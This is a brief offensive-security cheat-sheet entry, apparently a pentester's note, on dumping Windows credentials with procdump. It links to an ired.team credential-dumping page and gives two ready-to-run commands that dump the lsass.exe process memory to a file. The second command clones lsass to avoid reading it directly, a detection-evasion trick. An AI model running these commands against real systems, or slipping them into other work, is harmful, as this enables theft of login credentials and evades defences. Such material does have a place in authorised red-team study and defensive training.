# procdump

* https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
`procdump.exe -accepteula -ma lsass.exe lsass.dmp
`
// or avoid reading lsass by dumping a cloned lsass process
`procdump.exe -accepteula -r -ma lsass.exe lsass.dmp`